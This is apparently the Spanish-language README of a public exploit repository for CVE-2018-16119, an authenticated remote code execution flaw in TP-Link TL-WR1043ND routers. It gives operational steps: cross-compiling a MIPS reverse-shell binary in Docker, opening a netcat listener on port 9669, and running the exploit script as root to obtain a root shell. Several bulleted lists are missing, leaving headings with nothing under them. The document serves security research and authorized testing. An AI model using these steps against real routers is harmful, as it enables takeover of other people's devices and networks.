
TP-Link TL-WR1043ND - Ejecución Remota de Código Autenticada
CVE-2018-16119 es una vulnerabilidad crítica de ejecución remota de código autenticada que afecta a los routers TP-Link TL-WR1043ND. Esta vulnerabilidad permite a atacantes autenticados ejecutar comandos arbitrarios en el dispositivo objetivo con privilegios de root, lo que podría llevar al compromiso total del sistema.
Detalles del CVE: CVE-2018-16119
Una vez explotada, un atacante obtiene acceso a la shell root del router, lo que le permite:
# Install required packages
sudo apt-get update
sudo apt-get install netcat docker.io
El exploit requiere un binario de reverse shell MIPS big-endian. Sigue estos pasos para compilarlo:
# Copy the source code to /tmp
cp exploit/tftp_server/reverse_shell_mipsbe.c /tmp/
# Use Docker container with MIPS cross-compilation tools
docker run -v /tmp/:/tmp/ -it asmimproved/qemu-mips /bin/bash
Dentro del contenedor Docker:
cd /tmp
mips-linux-gnu-gcc -static reverse_shell_mipsbe.c -o shh
Salir de Docker y copiar el binario compilado:
cp /tmp/shh exploit/tftp_server/
Abre una terminal e inicia un listener netcat en el puerto 9669:
Linux:
nc -l -p 9669 -vv
macOS:
nc -l 9669 -vv
Ejecuta el script del exploit con privilegios de root (necesario para el servidor TFTP):
sudo python3 exploit/exploit.py
El script hará lo siguiente:
Una vez que se establece la conexión:
CVE-2018-16119/
├── exploit/
│ ├── exploit.py # Main exploit script
│ ├── requirements.txt # Python dependencies
│ ├── notes.txt # Additional notes
│ └── tftp_server/
│ ├── reverse_shell_mipsbe.c # Reverse shell source code
│ └── shh # Compiled MIPS binary
├── firmware/
│ └── wr740nv4_webrevert.bin # Sample firmware
├── squashfs-root/ # Extracted firmware filesystem
└── README.md # This file
Esta vulnerabilidad ha sido divulgada de manera responsable y solo debe utilizarse para:
⚠️ ADVERTENCIA: Este exploit se proporciona únicamente con fines educativos y de pruebas autorizadas. El acceso no autorizado a sistemas informáticos es ilegal y poco ético. Los usuarios son responsables de asegurarse de tener la autorización adecuada antes de usar esta herramienta.
Instalar requisitos de Python:
pip3 install -r exploit/requirements.txt
Permiso Denegado del Servidor TFTP:
Conexión Fallida:
Sin Respuesta de la Shell:
id o pwdEsta investigación demuestra fallos críticos de seguridad en el firmware de dispositivos integrados. La vulnerabilidad destaca la importancia de:
Investigación por: Alejandro Parodi
Twitter: @hdbreaker
LinkedIn: Alejandro Parodi
Esta investigación se realizó con fines educativos y para mejorar la seguridad de los sistemas integrados. Por favor, úsala de manera responsable.